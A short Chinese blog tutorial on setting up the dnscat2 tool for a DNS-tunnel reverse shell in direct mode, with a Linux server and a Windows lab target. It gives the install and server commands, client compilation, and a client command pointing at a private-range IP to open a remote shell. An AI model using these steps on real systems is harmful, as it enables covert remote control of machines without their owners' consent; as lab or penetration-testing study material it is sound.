使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

安鸾彭于晏2024-07-18 22:39
  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
之歆1 小时前
Linux文件系统与FHS详解
linux·文件系统
China_Yanhy3 小时前
转型AI运维工程师·Day 7:构建“数据飞轮” —— 每一句对话都是资产
运维·人工智能·状态模式
zl_dfq3 小时前
Linux 之 【多线程】(死锁、同步与竞态条件、条件变量、pthread_cond_xxx、POSIX信号量、sem_xxx)
linux
学Linux的语莫3 小时前
k8s常用命令
linux·容器·kubernetes
openKylin3 小时前
《2025年度OpenAtom openKylin社区全景案例集》正式发布
linux
CS_Zero3 小时前
Ubuntu安装Claude Code
linux·ubuntu·ai编程·claude
A星空1234 小时前
三、Kconfig介绍以及制作menuconfig界面
linux·运维·服务器
zylyehuo4 小时前
Windows & Linux 双系统资料整理
linux·夯实基础
安科士andxe5 小时前
实操指南|安科士1.25G CWDM SFP光模块选型、部署与运维全攻略
运维·数据库·5g
禾木KG5 小时前
网络安全-4 《中华人民共和国网络安全法》-2025年10月28日修正(共七章八十一条)
网络安全
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南04openclaw 配置飞书 报错 应用未建立长连接05UV安装并设置国内源06243 行 microGPT:把“训练 + 推理”拆到骨头里07HTB 赛季10 - Pterodactyl - user08如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解09AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南10openclaw配置教程(linux+局域网ollama)